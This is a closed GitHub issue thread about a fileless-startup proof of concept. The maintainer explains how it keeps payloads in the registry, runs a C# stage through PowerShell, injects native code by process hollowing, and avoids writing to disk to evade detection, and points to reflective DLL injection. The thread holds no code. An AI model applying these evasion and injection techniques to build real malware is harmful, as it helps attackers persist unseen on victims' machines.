Closed kiwids0220 closed 2 years ago
Hi, Just furthur trying to understand your code I think my question is that in order to load the actual payload
, the payload.exe has to be first written to the disk? or how would you load it as in the README The injector then proceeds to load the actual Payload.exe from its own executable resources. The payload is then injected using the process hollowing technique (RunPE).
// Loads Payload.exe (native executable) from resources and injects into suitable OS executable.
I am just wondering how am I supposed to insert a payload into registry when it's way over the size limit?
This project is a PoC that incorporates several techniques to demonstrate fileless startup. Of course, a lot more techniques exist. If you require something special, such as a large file, you need to figure out an implementation, such as multiple REG_BINARY
values, a download, etc... Not sure what the size limit is, though.
The used technique requires a first stage to be written in C#, because Powershell is only capable of executing C# code, not native code. The second stage demonstrates native code execution, because many payloads are not written in C#. But you can also decide to only use C# and skip the last stage.
payload.exe has to be first written to the disk?
The whole purpose of this PoC is to have nothing written to the disk, executables and DLL's in particular. Once you touch the disk, the "game is over".
but what if I want to let's say download the bytes and injected it into explorer.exe process [...] ?
If you want DLL injection without writing a DLL to disk, check out my other project r77 where I use reflective DLL injection. DLL injection becomes a hard task if you require it to happen in-memory, but it's entirely possible. My code is pretty clean and it should be easy to understand how it works and apply it in your own project.
I got it now. Thanks for the answer!
Hi. nice code! But I am just wondering how am I supposed to insert a payload into registry when it's way over the size limit? in the example I think you used MessageBoxA to call the native API. but what if I want to let's say download the bytes and injected it into explorer.exe process which means this might include multiple API calls? Please correct me if I am wrong on that. The only solution I can think of is that to create more registry keys and store them separately?